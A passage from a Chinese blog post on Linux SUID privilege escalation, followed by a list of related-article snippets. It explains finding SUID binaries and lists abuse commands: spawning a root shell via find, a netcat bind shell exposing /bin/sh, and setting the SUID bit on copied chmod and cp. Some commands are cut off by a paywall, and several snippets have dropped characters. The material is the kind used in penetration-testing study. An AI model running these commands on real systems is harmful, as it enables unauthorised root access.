suid提权全解(超细)

已于 2022-03-25 13:59:54 修改
阅读量8.4k 收藏 31
点赞数 3
分类专栏: 权限提升 文章标签: linux
于 2021-12-10 22:14:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51524329/article/details/121865922
版权

SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

查找suid文件

find / -perm -u=s -type f 2>/dev/null
/表示从文件系统的顶部(根)开始并找到每个目录
-perm 表示搜索随后的权限
-u = s表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2表示该进程的第二个文件描述符,即stderr(标准错误)

表示重定向
/ dev / null是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。

利用方式:

find命令

sudo find . -exec /bin/sh \; -quit
  
进行反弹shell也可以
find dirty -exec nc -lvp 9999 -e /bin/sh ;

chmod命令

sudo sh -c 'cp $(which chmod) .; chmod +s ./chmod

ash,linux shell

sudo ash

cp命令

sudo sh -c 'cp $(which cp) .; chmod +s

最低0.47元/天 解锁文章
操作系统(十九)Linux-SUID
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 2236
SUID是一种特殊限,设置了suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限。sgid与suid类似,只是执行程序时获得的是文件属组的限。passwd这个命令程序的限设置,它就是设置了suid限的只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义.命令执行者要对该程序文件拥有执行(x)限.命令执行者在执行该程序时获得该程序文件属主的身份.
suidlinux
weixin_68652890的博客
04-15 1096
suid suid(设置用户的id)Linux中的一种特殊限,当运行具有suid限的二进制文件的时候,使得调用者暂时获得该文件拥有者的限(比如a文件拥有者是root,且被赋予了s限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root限) 除了经常看见的rwx限还有s限 s限,设置使文件在执行阶段具有文件所有者的限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s限,就被称为Set UID,简称为SUID的特殊限。简称为SUID的特殊
Linuxsuid()
2303_78851087的博客
02-23 1080
Linuxsuid()
深入理解 SUID :原理、方法与实践
m0_57836225的博客
03-02 687
SUID 是渗透测试和系统安全研究中的重要技能,通过理解 SUID 限的概念、掌握查找具有 SUID 限文件的方法以及利用这些文件进行的技巧,我们可以更好地评估系统的安全性。同时,对于系统管理员来说,了解 SUID 的原理和方法,有助于及时发现和修复系统中可能存在的安全隐患,保障系统的稳定和数据的安全。在实际应用中,无论是进行安全测试还是维护系统安全,都需要谨慎对待 SUID 限,遵循安全规范,确保系统的安全性和稳定性。
SUID
最新发布
LukeXJ的博客
03-30 443
SUID(Set User ID)是一种在Linux/Unix系统中通过利用具有SUID限的程序实现升的技术。通过以上方法,攻击者可能利用SUID漏洞限,但需注意目标环境的具体配置和安全防护措施。实际操作时需谨慎评估风险。
SUID
snowlyzz的博客
08-14 1891
久经不衰的SUID
Linux被曝出SUDO漏洞,幸好影响不大
NOSEC2019的博客
10-15 2449
近期,有安全人员发现了Linux sudo命令中的一个安全漏洞,可让普通用户以root限执行命令。但值得庆幸的是,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。 在我们开始讨论这个漏洞前,有一些关于sudo命令的工作原理以及相关设置是需要去了解的。 当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo(super use...
LinuxSUID
Zlirving_的博客
08-25 892
0x00 SUID是什么? SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执du行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的限,也就是root   0x01 suid 运行某些程序时暂时获得root的限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来的:(三种都可以) find / -perm -u=s -type f 2>/
简谈SUID
2401_84466336的博客
05-28 1383
SUID (Set UID)Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
第十二章、特殊SUID等详解
weixin_34015336的博客
07-20 121
第十二章、特殊SUID等详解07_04_特殊SUID等详解特殊限e.g:ls -l /etc/passwdpasswd: s限三个特殊限:1. SUID:运行某程序时,相应进程的属主是程序文件自身的属主,而不是启动者;chmod u+s FILEchmod u-s FILE如果FIL...
Linux--SUID&内核漏洞本地用户
2401_84968693的博客
05-17 1078
目录SUID漏洞成因过程:手工命令探针:参考利用:脚本探针:LinEnum.shtraitorlinuxprivchecker等等…Linux命令的利用:find命令利用nc反弹利用python反弹–棱角内核漏洞本地用户过程:探针项目:命令执行: https://gtfobins.github.io/https://pentestlab.blog/2017/09/25/suid-executables/GitHub - rebootuser/LinEnum: Scripted Local L
网络安全实训十(Windows、UAC绕过、Linux利用suid)
Wrop的博客
09-12 1265
Windows、UAC绕过、Linux利用suid
Linux————利用SUID
热门推荐
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
suid梳理
Starr
03-13 2447
参考文章: https://www.freebuf.com/articles/web/272617.html SUID的概念,不多赘述。 查找具有suid限的可执行文件: find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ; 执行suid程序时若能执行命令,则可以利用。 nma
LinuxSUID
CP1024的博客
04-04 4077
LinuxSUID SUID 1. SUID限只能设置二进制文件 2. 命令执行者要有二进制文件的执行 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID限只在程序执行中有效 即如果root给一个程序赋予了SUID限,则普通用户在执行该程序过程中,是root限 cp命令 以cp为例,这里给cp添加SUID限做测试,拥有SUID限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
suidcp
01-20
### SUID方法 当文件设置了SUID位之后,任何运行该程序的用户都会暂时获得拥有者限。这可以被利用来进行操作。为了设置或移除SUID位,可使用`chmod`命令: ```bash chmod u+s filename # 设置SUID位 chmod u-s filename # 移除SUID位 ``` 一旦某个二进制文件具有了SUID限,攻击者可以通过执行此文件来获取更高的限[^2]。 #### 利用SUID进行的具体实例 假设存在一个带有SUID标志的应用程序允许用户修改其行为或参数,则可能成为潜在的安全风险点。例如,如果`/usr/bin/cp`这样的常用工具意外地获得了SUID属性,那么就可以创建恶意脚本并将其复制到受信任的位置从而实现非法访问控制升[^3]。 具体来说,下面是一个不安全的操作案例展示如何滥用这种机制完成过程: ```bash sudo sh -c 'cp $(which cp) .; chmod +s ./cp' ``` 这段代码的作用是从系统的路径中找到真正的`cp`命令位置,并将其副本放置于当前工作目录下;接着赋予新拷贝后的`cp`命令以SUID限。这意味着现在任何人都能以root的身份执行这个本地版本的`cp`指令。 ### CP技巧 对于CP(即copy命令),通常情况下它并不具备直接导致的能力。但是,在某些特殊场景里——比如上述到的情况或是其他形式误配置的情况下——它可以作为辅助手段参与到更复杂的攻击链路之中。特别是当管理员错误地授予了像`cp`这类基本实用程序额外特时,就有可能让普通用户绕过正常的安全限制而达到目的。 需要注意的是,以上描述仅用于教育和技术交流用途,请勿尝试在未经授许可的前下实施此类行动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值